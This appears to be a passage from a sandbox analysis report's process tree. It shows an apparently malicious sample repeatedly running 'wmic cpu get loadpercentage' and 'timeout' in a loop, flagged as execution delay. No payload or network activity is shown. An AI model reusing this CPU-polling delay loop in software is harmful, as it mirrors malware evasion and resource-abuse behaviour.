C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3520
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2692
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3044
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4712
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1200
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4272
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1440
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4504
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4532
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5004
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3920
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2408
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4412
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1032
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2628
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2308
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2096
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4772
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2632
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2188
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4664
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5044
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5064
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4560
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3944
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3996
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1872
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1476
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4164
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4652
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2328
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2364
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1164
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2936
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3812
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1276
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2960
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1752
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3152
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1600
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4440
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4332
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:864
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1304
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2460
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2292
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:700
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3708
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3376
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4220
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4456
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4956
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3560
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3440
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3540
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3516
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4240
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1436
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4348
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2320
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2496
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4216
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3928
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3528
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1640
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3956
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3512
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:1352
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2396
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4636
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:652
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1812
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1376
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2224
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1956
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3736
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:512
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4004
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:764
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5056
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1060
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4588
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4740
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4952
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4124
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1360
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:760
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3912
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1100
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4644
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1672
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1212
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3696
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:364
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:372
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1712
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5052
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3536
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4432
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3160
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1596
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4268
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2916
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2516
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4968
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3944
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3368
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1872
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:976
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3012
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4652
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:308
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2328
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1940
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1216
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1208
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1740
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2848
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4252
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3164
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1468
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4244
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1636
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:864
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4356
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2832
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:208
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2156
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4220
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:196
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4624
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4084
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:540
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3440
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4492
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3936
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4240
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1072
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2496
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2456
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:4996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3528
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3384
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4832
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2684
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:788
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4452
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2428
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:652
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2868
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3232
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2224
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3508
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3736
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2140
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1804
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3052
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1060
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2384
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:524
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3100
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1360
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5076
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4532
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4168
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4520
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1100
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4660
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3696
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5060
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4276
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1712
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2616
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2096
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3536
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3224
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3160
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2544
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1544
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4268
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4696
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3412
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3432
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3672
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:224
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4912
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4164
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4652
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2416
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2812
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2160
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1940
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4836
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4256
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2992
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3140
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1592
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3164
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4944
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:1304
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:864
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1296
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2292
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2832
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:432
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1312
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4220
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3380
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3948
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4624
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3192
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5024
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5012
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:540
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4336
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:508
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1436
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2456
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4996
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4116
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3928
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4676
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4100
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2684
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3028
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2488
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4036
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1812
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:632
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2372
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3232
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3508
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:512
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:424
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3844
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1104
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1060
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4588
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4952
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3020
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2384
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4504
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2648
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5076
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1300
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3920
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4520
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2408
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1100
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1068
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1212
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:4608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3816
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2616
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:212
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2752
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:440
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3196
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2556
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4468
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2404
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1476
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:240
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3944
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2620
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:404
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1384
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4188
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:60
-
-
-
